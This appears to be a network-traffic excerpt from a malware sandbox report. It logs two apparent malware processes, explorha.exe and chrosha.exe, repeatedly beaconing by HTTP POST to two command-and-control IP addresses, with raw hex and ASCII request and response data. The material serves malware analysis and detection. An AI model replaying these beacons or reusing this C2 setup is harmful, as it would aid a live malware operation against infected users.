Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
119 | 192.168.2.5 | 49955 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:25.809533119 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:26.046732903 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:25 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
120 | 192.168.2.5 | 49956 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:25.882150888 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:26.130887985 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:25 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
Apr 19, 2024 03:30:26.133639097 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:30:26.387231112 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:26 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
121 | 192.168.2.5 | 49957 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:26.290864944 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:30:26.537076950 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:26 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
122 | 192.168.2.5 | 49958 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:26.731304884 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:26.969588995 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:26 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
Apr 19, 2024 03:30:26.970752001 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:30:27.213520050 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:27 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
123 | 192.168.2.5 | 49959 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:26.905539989 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:27.158054113 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:27 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
124 | 192.168.2.5 | 49960 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:27.404875994 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:30:27.652173996 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:27 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
125 | 192.168.2.5 | 49961 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:27.573203087 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:27.816133976 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:27 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
Apr 19, 2024 03:30:27.817336082 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:30:28.063870907 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:27 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
126 | 192.168.2.5 | 49962 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:28.010478973 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:28.258400917 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:28 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
127 | 192.168.2.5 | 49963 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:28.268959045 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:30:28.512623072 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:28 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
128 | 192.168.2.5 | 49964 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:28.429094076 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:28.677170992 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:28 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
Apr 19, 2024 03:30:28.680423975 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:30:28.933939934 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:28 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
129 | 192.168.2.5 | 49965 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:28.868068933 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:29.115343094 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:28 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
130 | 192.168.2.5 | 49966 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:29.292473078 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:29.538041115 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:29 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
Apr 19, 2024 03:30:29.539248943 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:30:29.789638042 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:29 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
131 | 192.168.2.5 | 49967 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:29.363692045 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:30:29.613923073 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:29 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
132 | 192.168.2.5 | 49968 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:29.979830027 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:30.227817059 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:30 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
133 | 192.168.2.5 | 49969 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:30.149347067 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:30.399357080 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:30 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:30.400399923 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
